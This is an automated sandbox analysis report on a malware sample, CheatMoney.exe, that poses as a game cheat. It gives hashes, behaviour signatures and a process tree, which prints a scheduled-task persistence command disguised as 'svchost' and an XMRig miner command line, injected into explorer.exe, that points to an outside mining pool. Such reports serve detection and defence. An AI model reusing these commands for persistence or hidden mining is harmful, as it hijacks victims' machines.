Overview

overview

10

Static

static

3

Cheat1.exe

windows7-x64

10

Cheat1.exe

windows10-1703-x64

10

CheatMoney.exe

windows7-x64

10

CheatMoney.exe

windows10-1703-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 00:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CheatMoney.exe

  • Size

    2.1MB

  • MD5

    9508a0c17382c6ea967e0da17e23b0a2

  • SHA1

    a696428ad01878d33051805e438a53c1bf10dd29

  • SHA256

    82f9d14f7701edcad6ded45a0abd00e7bd13de1eaca985c2eb42caa108e25781

  • SHA512

    f338d52012b1ff171e7d59cdefea8bd26958e9f8a3cf96abe51b43333119acf6371ad0fd7de321dd67f5a31130c9fa1ed7b68a98bec4b6ccb269b75966b69aa6

  • SSDEEP

    49152:6BkKmtC0IBHKvlvLKefgiz0bQng5P4G4kdb:6BFmtC0IBHUZLKeYiIbQng5AG4kx

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 17 IoCs
    miner
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\CheatMoney.exe
    "C:\Users\Admin\AppData\Local\Temp\CheatMoney.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\CheatMoney.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1392
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
          4⤵
          • Creates scheduled task(s)
          PID:2560
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2552
        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          C:\Users\Admin\AppData\Local\Temp\svchost.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:564
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:2164
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7201279 --pass=CheatMoney --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1252

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      Filesize

      30KB

      MD5

      0fc88f751a732f0441955d51b896e203

      SHA1

      429b03e355f1200eabc1867d0a07254fc5a2c1ad

      SHA256

      38c5252e0079a6fde514d5057a53981551fe57691cb58c17ea5e98aa2405d962

      SHA512

      a66e97ebd914dfab03677f4ea81d4c1a2ce108c7f4b4d490c0a60f7a5228ab6ad5ce701e62f658ff9c7c84e95c1d6272e5b563f52fd717b325bbc50059dd43c6

      Download Submit

    • \Users\Admin\AppData\Local\Temp\svchost.exe
      Filesize

      2.1MB

      MD5

      9508a0c17382c6ea967e0da17e23b0a2

      SHA1

      a696428ad01878d33051805e438a53c1bf10dd29

      SHA256

      82f9d14f7701edcad6ded45a0abd00e7bd13de1eaca985c2eb42caa108e25781

      SHA512

      f338d52012b1ff171e7d59cdefea8bd26958e9f8a3cf96abe51b43333119acf6371ad0fd7de321dd67f5a31130c9fa1ed7b68a98bec4b6ccb269b75966b69aa6

      Download Submit

    • memory/564-56-0x000007FEF49E0000-0x000007FEF53CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/564-17-0x000007FEF49E0000-0x000007FEF53CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/564-16-0x000007FEF49E0000-0x000007FEF53CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/564-15-0x000007FEF49E3000-0x000007FEF49E4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1252-61-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-58-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-51-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1252-55-0x0000000000070000-0x0000000000090000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1252-31-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-33-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-36-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-28-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-39-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-62-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-52-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-43-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-37-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-59-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-60-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-42-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-57-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-54-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-50-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-47-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-29-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1252-46-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1392-6-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1392-0-0x00000000000D0000-0x00000000002F0000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/1392-1-0x000007FEF53D3000-0x000007FEF53D4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1392-2-0x000000001B490000-0x000000001B6B0000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/1392-3-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1392-4-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1392-5-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1392-13-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2164-64-0x0000000000060000-0x0000000000066000-memory.dmp

      Filesize

      24KB

      Download

    • memory/2164-65-0x0000000000290000-0x0000000000296000-memory.dmp

      Filesize

      24KB

      Download